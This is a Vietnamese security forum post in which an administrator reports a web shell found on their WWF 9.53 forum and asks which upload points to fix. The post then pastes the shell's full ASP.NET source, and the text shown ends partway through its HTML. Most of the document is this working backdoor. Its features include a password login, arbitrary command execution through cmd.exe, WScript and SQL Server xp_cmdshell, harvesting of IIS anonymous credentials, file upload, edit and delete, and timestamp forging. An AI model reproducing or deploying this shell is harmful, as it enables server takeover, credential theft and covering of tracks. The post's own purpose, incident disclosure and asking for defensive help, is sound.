English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix  XML
  [Question]   Forum WWF 9.53 bị nhiễm K-SHELL, làm sao để fix 24/11/2008 12:17:20 (+0700) | #1 | 160026
ktstbniit
Member
[Minus]    0    [Plus]
Joined: 03/01/2007 10:39:15
Messages: 5
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hôm nay vào forum, tôi thấy có 1 file có tên là dbcn.aspx, mở ra tôi đoán chính xác là 1 con shell. Chạy lên nó hiện như sau: K - Shell ....kikicoco

Tôi đã dò tất cả các phần mà ủe có thể upload. Tuy nhiên, tôi muốn member nào đã có kinh nghiệm về vụ này chia sẻ cho tôi những chỗ nào cần fix trong forum.

Dưới đây là mã nguồn của nó:

Code:
<%@ Page Language="VB" ContentType="text/html"  validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<script runat="server">
Dim PASSWORD as string = "26d49f07ceebca39e994ca12a3b52f2d"   'Hash MD5 of password
dim url,TEMP1,TEMP2,TITLE as string
Function GetMD5(ByVal strPlain As String) As String
 	Dim UE As UnicodeEncoding = New UnicodeEncoding
 	Dim HashValue As Byte()
 	Dim MessageBytes As Byte() = UE.GetBytes(strPlain)
 	Dim md5 As MD5 = New MD5CryptoServiceProvider
 	Dim strHex As String = ""
 	HashValue = md5.ComputeHash(MessageBytes)
	 For Each b As Byte In HashValue
   	strHex += String.Format("{0smilie2}", b)
 	Next
 	Return strHex
End Function
Sub Login_click(sender As Object, E As EventArgs)
	if GetMD5(Textbox.Text)=PASSWORD then     
		session("kikicoco")=1
		session.Timeout=45
	else
		response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
	end if
End Sub
'Run w32 shell
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long

Sub RunCmdW32(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")		
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtCommand1") = "" Then
		command = "dir c:\"	
	else 
		command = Request.Form("txtCommand1")
	End If	
	ExecuteCommand1(command,tempFile)
	OutputTempFile1(tempFile,fileObject)
	'txtCommand1.text=""
End Sub
function ExecuteCommand1(command, tempFile)
	Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
	Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
	Dim FailIfExists
	
	local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
	local_copy_of_cmd = Local_dir+"cmd.exe"
	Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\smssa.exe"
	CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
	errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
	response.write(errReturn)
	thread.sleep(500)
	end function
Sub OutputTempFile1(tempFile,oFileSys)
	On Error Resume Next 
	dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
	resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
   	oFile.Close
   	Call oFileSys.DeleteFile(tempFile, True)	 
End sub
'End w32 shell
'Run WSH shell
Sub RunCmdWSH(Src As Object, E As EventArgs)
	dim command
	dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
	dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
	dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
	If Request.Form("txtcommand2") = "" Then
		command = "dir c:\"	
	else 
		command = Request.Form("txtcommand2")
	End If	  
	ExecuteCommand2(command,tempFile)
	OutputTempFile2(tempFile,fileObject)
	txtCommand2.text=""
End Sub
Function ExecuteCommand2(cmd_to_execute, tempFile)
	  Dim oScript
	  oScript = Server.CreateObject("WSCRIPT.SHELL")
      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
End function
Sub OutputTempFile2(tempFile,fileObject)
    On Error Resume Next
	dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
	resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
	oFile.Close
	Call fileObject.DeleteFile(tempFile, True)
End sub
'End WSH shell

'System infor
Sub output_all_environment_variables(mode)
   	Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
   	Dim de As DictionaryEntry
	For Each de In  environmentVariables
	if mode="HTML" then
	response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
	else
	if mode="text"
	response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
	end if		
	end if
   	Next
End sub
Sub output_all_Server_variables(mode)
    dim item
    for each item in request.servervariables
	if mode="HTML" then
	response.write("<b>" + item + "</b> : ")
	response.write(request.servervariables(item))
	response.write("<br>")
	else
		if mode="text"
			response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
		end if		
	end if
           next
End sub
'End sysinfor

'Begin List processes
Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i

		'on error resume next

		table("0","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)

		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
		
		fields_split = split(Fields_to_Show,",")
		for each item in objProcessInfo	
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))				
					next
				end if
			_tr
		next
End function
Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
		dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
		dim fields_split, fields_item,i,count
		newline
		rw("Showing the first " + cstr(MaxCount) + " Entries")
		newline
		newline
		table("1","","")
		Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
		_table
		winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
'		objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)					
		objProcessInfo = winObj.InstancesOf(Wmi_Function)					
		
		fields_split = split(Fields_to_Show,",")
		count = 0
		for each item in objProcessInfo		
			count = Count + 1
			table("1","","")
			tr
				Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
				if Ubound(Fields_split)>0 then
					for i = 1 to ubound(fields_split)
						Surround_by_TD(item.properties_.item(fields_split(i)).value)				
					next
				end if
			_tr
			if count > MaxCount then exit for
		next
End function
'End List processes
'Begin IIS_list_Anon_Name_Pass
Sub IIS_list_Anon_Name_Pass()
		Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
		
		IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") 			' Create an instance of the IIsComputer object
		providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
		nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
		
		Dim MaxCount = 20,Count = 0
		hr
		RW("only showing the first "+cstr(MaxCount) + " items")
		hr
		for each item in nodeObj
			response.write("<b>" + item.AppFriendlyName + " </b> -  ")
			response.write("(" + item.AppPoolId + ") ")
		
			response.write(item.AnonymousUserName + " : ")
			response.write(item.AnonymousUserPass)
			
			response.write("<br>")
			
			response.flush
			Count = Count +1
			If Count > MaxCount then exit for
		next		
		hr
End sub	
'End IIS_list_Anon_Name_Pass
Sub RunCMD(Src As Object, E As EventArgs)
	Try
	Dim kProcess As New Process()
	Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
	kProcessStartInfo.UseShellExecute = False
	kProcessStartInfo.RedirectStandardOutput = true
	kProcess.StartInfo = kProcessStartInfo
	kProcessStartInfo.Arguments="/c " & Cmd.text
	kProcess.Start()
	Dim myStreamReader As StreamReader = kProcess.StandardOutput
	Dim myString As String = myStreamReader.Readtoend()
	kProcess.Close()
	result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
	Cmd.text=""
	Catch
	result.text="This function has disabled!"
	End Try
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
	existdir(time1.Text)
	existdir(time2.Text)
	Dim thisfile As FileInfo =New FileInfo(time1.Text)
	Dim thatfile As FileInfo =New FileInfo(time2.Text)
	thisfile.LastWriteTime = thatfile.LastWriteTime
	thisfile.LastAccessTime = thatfile.LastAccessTime
	thisfile.CreationTime = thatfile.CreationTime
	response.Write("<font color=""red"">Clone Time Success!</font>")
End Sub
sub Editor(Src As Object, E As EventArgs)
	dim mywrite as new streamwriter(filepath.text,false,encoding.default)
	mywrite.write(content.text)
	mywrite.close
	response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
	dim filename,loadpath as string
	filename=path.getfilename(UpFile.value)
	loadpath=request.QueryString("src") & filename
	if  file.exists(loadpath)=true then 
		response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
		response.End()
	end if
	UpFile.postedfile.saveas(loadpath)
	response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
	response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
	url=request.form("src")
	if NewFile.Checked = True then
		dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
		mywrite.close
		response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
	else
		directory.createdirectory(url & NewName.Text)
		response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
	end if
End Sub
Sub del(a)
	if right(a,1)="\" then
		dim xdir as directoryinfo
		dim mydir as new DirectoryInfo(a)
		dim xfile as fileinfo
		for each xfile in mydir.getfiles()
			file.delete(a & xfile.name)
		next
		for each xdir in mydir.getdirectories()
			call del(a & xdir.name & "\")
		next
		directory.delete(a)
	else
		file.delete(a)
	end if
End Sub
Sub copydir(a,b)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(a)
	dim xfile as fileinfo
	for each xfile in mydir.getfiles()
		file.copy(a & "\" & xfile.name,b & xfile.name)
	next
	for each xdir in mydir.getdirectories()
		directory.createdirectory(b & path.getfilename(a & xdir.name))
		call copydir(a & xdir.name & "\",b & xdir.name & "\")
	next
End Sub
Sub xexistdir(temp,ow)
	if directory.exists(temp)=true or file.exists(temp)=true then 
		if ow=0  then
			response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
		elseif ow=1 then
			del(temp)
		else
			dim d as string = session("cutboard")
			if right(d,1)="\" then
				TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
			else
				TEMP2=url & second(now) & replace(path.getfilename(d),"","")
			end if
		end if
	end if
End Sub
Sub existdir(temp)
		if  file.exists(temp)=false and directory.exists(temp)=false then 
			response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
			response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
			response.End()
		end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
	Dim adoConn,strQuery,recResult,strResult
	if SqlName.Text<>"" then
		adoConn=Server.CreateObject("ADODB.Connection") 
		adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text) 
		If Sqlcmd.Text<>"" Then 
			strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'" 
	  		recResult = adoConn.Execute(strQuery) 
 	 		If NOT recResult.EOF Then 
   				Do While NOT recResult.EOF 
    				strResult = strResult & chr(13) & recResult(0).value
    				recResult.MoveNext 
   				Loop 
 	 		End if 
  			recResult = Nothing 
  			strResult = Replace(strResult," "," ") 
  			strResult = Replace(strResult,"<","<") 
  			strResult = Replace(strResult,">",">") 
			resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
			SqlCMD.Text=""
		 End if 
  		adoConn.Close 
	 End if
 End Sub
Function GetStartedTime(ms) 
	GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP() 
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
	dim temp,k as integer
	temp=1
	k=0
	if len(nowdir)>4 then 
		nowdir=left(nowdir,len(nowdir)-1) 
	end if
	do while temp<>0
		k=temp+1
		temp=instr(temp,nowdir,"\")
		if temp =0 then
			exit do
		end if
		temp = temp+1
	loop
	if k<>2 then
		getparentdir=mid(nowdir,1,k-2)
	else
		getparentdir=nowdir
	end if
End function
Function Rename()
	url=request.QueryString("src")
	if file.exists(Getparentdir(url) & request.Form("name")) then
		rename=0   
	else
		file.copy(url,Getparentdir(url) & request.Form("name"))
		del(url)
		rename=1
	end if
End Function 
Function GetSize(temp)
	if temp < 1024 then
		GetSize=temp & " bytes"
	else
		if temp\1024 < 1024 then
			GetSize=temp\1024 & " KB"
		else
			if temp\1024\1024 < 1024 then
				GetSize=temp\1024\1024 & " MB"
			else
				GetSize=temp\1024\1024\1024 & " GB"
			end if
		end if
	end if
End Function 
	Sub downTheFile(thePath)
		dim stream
		stream=server.createObject("adodb.stream")
		stream.open
		stream.type=1
		stream.loadFromFile(thePath)
		response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
		response.addHeader("Content-Length",stream.Size)
		response.charset="UTF-8"
		response.contentType="application/octet-stream"
		response.binaryWrite(stream.read)
		response.flush
		stream.close
		stream=nothing
		response.End()
End Sub
'H T M L  S N I P P E T S
public sub Newline
		response.write("<BR>")
	end sub
	
	public sub TextNewline
		response.write(vbnewline)
	end sub

	public sub rw(text_to_print)	  ' Response.write
		response.write(text_to_print)
	end sub

	public sub rw_b(text_to_print)
		rw("<b>"+text_to_print+"</b>")
	end sub

	public sub hr()
		rw("<hr>")
	end sub

	public sub ul()
		rw("<ul>")
	end sub

	public sub _ul()
		rw("</ul>")
	end sub

	public sub table(border_size,width,height)
		rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
	end sub

	public sub _table()
		rw("</table>")
	end sub

	public sub tr()
		rw("<tr>")
	end sub

	public sub _tr()
		rw("</tr>")
	end sub

	public sub td()
		rw("<td>")
	end sub

	public sub _td()
		rw("</td>")
	end sub

	public sub td_span(align,name,contents)
		rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
	end sub

	Public sub td_link(align,title,link,target)
		rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
	end sub

	Public sub link(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
	end sub

	Public sub link_hr(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		hr
	end sub

	Public sub link_newline(title,link,target)
		rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
		newline
	end sub
	
	public sub empty_Cell(ColSpan)
		rw("<td colspan='"+cstr(colspan)+"'></td>")
	end sub

	public sub empty_row(ColSpan)
		rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
	end sub

       	Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
            dim rowItem

            rowItems = split(rowItems,",")
            response.write("<tr bgcolor="+bgcolor+">")
            for each rowItem in RowItems
                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
            next
            response.write("</tr>")

        end sub

        Public sub TR_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub
	

        Public sub Surround_by_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub

        Public sub Surround_by_TD_and_Bold(cellContents)
            response.write("<td><b>")
            response.write(cellContents)
            response.write("</b></td>")
        end sub

        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
            response.write(cellContents)
            response.write("</b></font></td>")
        end sub
	Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
		response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
		response.write("    <tr heigth=20>")
		response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
		response.write("    </tr>")
		response.write("    <tr>")
		response.write("      <td>"+main_Cell_contents+"</td>")
		response.write("    </tr>")
		response.write("  </table>")
		response.write("</div>")
	end sub

	Public sub Create_Div_open(top,left,width,height,z_index)
		response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
	end sub


	Public sub Create_Div_close()
		response.write("</div>")
	end sub

	public sub Create_Iframe(left, top, width, height, name,src)
		rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
    		rw("</span>")
	end sub

	public sub Create_Iframe_relative(width, height, name,src)
		rw("	<iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
	end sub

	public sub return_100_percent_table()
		rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
	end sub

	public sub font_size(size)
		rw("<font size="+size+">")
	end sub

	public sub end_font()
		rw("</font>")
	end sub

	public sub red(contents)
		rw("<font color=red>"+contents+"</font>")
	end sub

	public sub yellow(contents)
		rw("<font color='#FF8800'>"+contents+"</font>")
	end sub

	public sub green(contents)
		rw("<font color=green>"+contents+"</font>")
	end sub
	public sub print_var(var_name, var_value,var_description)
		if var_description<> "" Then
			rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
		else
			rw(b_(var_name)+" : " + var_value)
		end if
		newline
	end sub

' Functions

	public function br_()
		br_ = "<br>"
	end function

	public function b_(contents)
		b_ = "<b>"+ contents + "</b>"
	end function

	public function i_(contents)
		i_ = "<i>"+ contents + "</i>"
	end function

	public function li_(contents)
		li_ = "<li>"+ contents + "</li>"
	end function

	public function h1_(contents)
		h1_ = "<h1>"+ contents + "</h1>"
	end function

	public function h2_(contents)
		h2_ = "<h2>"+ contents + "</h2>"
	end function

	public function h3_(contents)
		h3_ = "<h3>"+ contents + "</h3>"
	end function

	public function big_(contents)
		big_ = "<big>"+ contents + "</big>"
	end function

	public function center_(contents)
		center_ = "<center>"+ cstr(contents) + "</center>"
	end function


	public function td_force_width_(width)
		td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
	end function


	public function red_(contents)
		red_ = "<font color=red>"+contents+"</font>"
	end function

	public function yellow_(contents)
		yellow_ = "<font color='#FF8800'>"+contents+"</font>"
	end function

	public function green_(contents)
		green_ = "<font color=green>"+contents+"</font>"
	end function

	Public function link_(title,link,target)
		link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
	end function
'End HTML SNIPPETS	
</script>
<%
if request.QueryString("action")="down" and session("kikicoco")=1 then
		downTheFile(request.QueryString("src"))
		response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then 
TITLE="CMD.NET"
elseif hu="cmdw32" then 
TITLE="ASP.NET W32 Shell"
elseif hu="cmdwsh" then 
TITLE="ASP.NET WSH Shell"
elseif hu="sqlrootkit" then 
TITLE="SqlRootKit.NET"
elseif hu="clonetime" then 
TITLE="Clone Time"
elseif hu="information" then 
TITLE="Web Server Info"
elseif hu="goto" then 
TITLE="K-Shell 1.0"
elseif hu="pro" then 
TITLE="List processes from server"
elseif hu="user" then 
TITLE="List User Accounts"
elseif hu="applog" then 
TITLE="List Application Event Log Entries"
elseif hu="syslog" then 
TITLE="List System Event Log Entries"
elseif hu="auser" then 
TITLE="IIS List Anonymous' User details"
else 
TITLE=request.ServerVariables("HTTP_HOST") 
end if
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<style type="text/css">
body,td,th {
	color: #000000;
	font-family: Verdana;
}
body {
	background-color: #ffffff;
	font-size:12px; 
}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.style3 {color: #FF0000}
</style>
<head>
<meta http-equiv="Content-Type" content="text/html">
<title><%=TITLE%></title>
</head>
<body>
<div align="center">K-Shell 1.0 By <a href="" target="_blank" title="Welcome to my page:)">kikicoco</a> from Vietnam [<a href="" target="_blank">VN</a>]</div>
<hr>
<%
Dim error_x as Exception
Try
if session("kikicoco")<>1 then
	'response.Write("<br>")
	'response.Write("Hello , thank you for using my program !<br>")
	'response.Write("This program is run at ASP.NET Environment and manage the web directory.<br>")
	'response.Write("Maybe this program looks like a backdoor , but I wish you like it and don't hack :p<br><br>")
	'response.Write("<span class=""style3"">Notice:</span> only click ""Login"" to login.")
%>
<form runat="server">
  Your Password:<asp:TextBox ID="TextBox" runat="server"  TextMode="Password" class="TextBox" />  
  <asp:Button  ID="Button" runat="server" Text="Login" ToolTip="Click here to login"  OnClick="login_click" class="buttom" />
</form> 
<%
else
	dim temp as string
	temp=request.QueryString("action")
	if temp="" then temp="goto"
	select case temp
	case "goto"
		if request.QueryString("src")<>"" then
			url=request.QueryString("src")
		else
			url=server.MapPath(".") & "\"
		end if
	call existdir(url)
	dim xdir as directoryinfo
	dim mydir as new DirectoryInfo(url)
	dim hupo as string
	dim xfile as fileinfo
%>
<table width="90%"  border="0" align="center">
  <tr>
  	<td>Currently Dir:</td> <td><font color=red><%=url%></font></td>
  </tr>
  <tr>
    <td width="13%">Operate:</td>
    <td width="87%"><a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> - 
      <%if session("cutboard")<>"" then%>
      <a href="?action=plaster&src=<%=server.UrlEncode(url)%>" title="you can plaster">Paste</a> - 
      <%else%>
	Paste - 
<%end if%>
<a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file">UpLoad</a> - <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory">GoBackDir </a> - <a href="?action=logout" title="Exit">Quit</a></td>
  </tr>
  <tr>
    <td>
	Go to: </td>
    <td>
<%
dim i as integer
for i =0 to Directory.GetLogicalDrives().length-1
 	response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
next
%>
</td>
  </tr>

  <tr>
    <td>Tool:</td>
    <td><a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro" >List Processes</a></td>    
  </tr>
  <tr>
    <td> </td>
    <td><a href="?action=applog" >Application Event Log </a> - <a href="?action=user" >List User Accounts</a> - <a href="?action=syslog" >System Log</a> - <a href="?action=auser" >IIS List Anonymous' User details</a></td>    
  </tr>
</table>
<hr>
<table width="90%"  border="0" align="center">
	<tr>
	<td width="40%"><strong>Name</strong></td>
	<td width="15%"><strong>Size</strong></td>
	<td width="20%"><strong>ModifyTime</strong></td>
	<td width="25%"><strong>Operate</strong></td>
	</tr>
      <tr>
        <td><%
		hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
		response.Write(hupo)
		for each xdir in mydir.getdirectories()
			response.Write("<tr>")
			dim filepath as string 
			filepath=server.UrlEncode(url & xdir.name)
			hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
			response.Write(hupo)
			response.Write("<td><dir></td>")
			response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
			hupo="<td><a href='?action=cut&src=" & filepath & "\'  target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\'  target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
			response.Write(hupo)
			response.Write("</tr>")
		next
		%></td>
  </tr>
		<tr>
        <td><%
		for each xfile in mydir.getfiles()
			dim filepath2 as string
			filepath2=server.UrlEncode(url & xfile.name)
			response.Write("<tr>")
			hupo="<td>" & xfile.name & "</td>"
			response.Write(hupo)
			hupo="<td>" & GetSize(xfile.length) & "</td>"
			response.Write(hupo)
			response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
			hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"			
			response.Write(hupo)
			response.Write("</tr>")
		next
		response.Write("</table>")
		%></td>
      </tr>
</table>
<script language="javascript">
function del()
{
if(confirm("Are you sure?")){return true;}
else{return false;}
}
function down()
{
if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
else{return false;}
}
</script>
<%
case "information"
	dim CIP,CP as string
	if getIP()<>request.ServerVariables("REMOTE_ADDR") then
			CIP=getIP()
			CP=request.ServerVariables("REMOTE_ADDR")
	else
			CIP=request.ServerVariables("REMOTE_ADDR")
			CP="None"
	end if
%>
<div align=center>[ Web Server Information ]        <i><a href="javascript:history.back(1);">Back</a></i></div><br>
<table width="80%"  border="1" align="center">
  <tr>
    <td width="40%">Server IP</td>
    <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
  </tr>
  <tr>
    <td height="73">Machine Name</td>
    <td><%=Environment.MachineName%></td>
  </tr>
  <tr>
    <td>Network Name</td>
    <td><%=Environment.UserDomainName.ToString()%></td>
  </tr>
  <tr>
    <td>User Name in this Process</td>
    <td><%=Environment.UserName%></td>
  </tr>
  <tr>
    <td>OS Version</td>
    <td><%=Environment.OSVersion.ToString()%></td>
  </tr>
  <tr>
    <td>Started Time</td>
    <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
  </tr>
  <tr>
    <td>System Time</td>
    <td><%=now%></td>
  </tr>
  <tr>
    <td>IIS Version</td>
    <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
  </tr>
  <tr>
    <td>HTTPS</td>
    <td><%=request.ServerVariables("HTTPS")%></td>
  </tr>
  <tr>
    <td>PATH_INFO</td>
    <td><%=request.ServerVariables("PATH_INFO")%></td>
  </tr>
  <tr>
    <td>PATH_TRANSLATED</td>
    <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
  <tr>
    <td>SERVER_PORT</td>
    <td><%=request.ServerVariables("SERVER_PORT")%></td>
  </tr>
    <tr>
    <td>SeesionID</td>
